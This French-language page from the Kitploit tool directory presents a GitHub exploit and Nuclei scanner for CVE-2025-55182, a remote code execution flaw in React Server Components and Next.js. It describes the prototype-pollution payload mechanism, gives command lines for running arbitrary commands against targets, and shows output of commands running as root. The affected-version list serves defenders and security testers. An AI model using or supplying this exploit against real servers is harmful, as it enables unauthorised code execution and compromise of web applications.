Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — CVE-2025-55182 - Exploit et scanner RCE React Server Components Prend en charge les serveurs externes et l'interface CLI | Kitploit
Outils/GitHubGitHub/sickwell/cve-2025-55182
Scanners de VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubsickwell/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 - Exploit et scanner RCE React Server Components Prend en charge les serveurs externes et l'interface CLI

Voir le dépôt
1361il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - Exploitation RCE des Actions Serveur React & Next.js

Exploit et scanner d'exécution de code à distance complet pour CVE-2025-55182 dans les Actions Serveur React/Next.js.

PoC original : Spritualkb/CVE-2025-55182-exp

Présentation

CVE-2025-55182 est une vulnérabilité critique de pollution de prototype dans les composants serveur React qui permet l'exécution de code à distance. Ce dépôt fournit à la fois des outils de scan automatisé (modèle Nuclei) et d'exploitation manuelle (script Python).

Mécanisme de la vulnérabilité :

L'exploit exploite la pollution de prototype dans la désérialisation du protocole React Flight. Il pollue Object.prototype.then via "$1:__proto__:then" et obtient l'accès au constructeur Function via _formData.get défini sur "$1:constructor:constructor", puis injecte du code malveillant via _prefix qui est exécuté par Function().

Outils

1. Modèle Nuclei (cve-2025-55182.yaml)

Scanner de vulnérabilité automatisé qui exécute la commande id et récupère la sortie via l'en-tête X-Action-Redirect.

Utilisation :

root@kitploit:~
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml

Fonctionnalités :

  • Exécute une commande de test (id) pour vérifier l'RCE
  • Extrait la sortie de la commande des en-têtes de réponse
  • Multiples indicateurs de détection (statut 303, en-têtes de redirection, motifs d'erreur)

2. Exploit RCE Python (CVE-2025-55182.py)

Script d'exploit RCE complet qui exécute des commandes arbitraires et récupère la sortie.

Utilisation :

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Fonctionnalités :

  • Exécuter des commandes arbitraires
  • Extraction automatique de la sortie depuis l'en-tête X-Action-Redirect
  • Prise en charge des formats HTTP/HTTPS et IP:PORT
  • Option de contournement de la vérification du certificat SSL
  • Sortie propre et formatée

Résultats des tests

Modèle Nuclei

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Exploit Python

root@kitploit:~
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"

============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================

[*] Target: http://localhost:3001
[*] Command: id
[*] Building payload...
[*] Sending exploit payload...

============================================================
[+] Command executed successfully!
============================================================
[+] Command Output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------

============================================================
[*] Exploitation attempt completed
============================================================

Versions affectées

  • react-server-dom-webpack : 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel : 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack : 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js : 15.x, 16.x (App Router avec Actions Serveur)

Crédits

  • PoC original : Spritualkb - CVE-2025-55182-exp

Références

  • Avis de sécurité React
  • GitHub Next.js

Avertissement

UNIQUEMENT À DES FINS ÉDUCATIVES ET DE TEST AUTORISÉ

Télécharger l’outil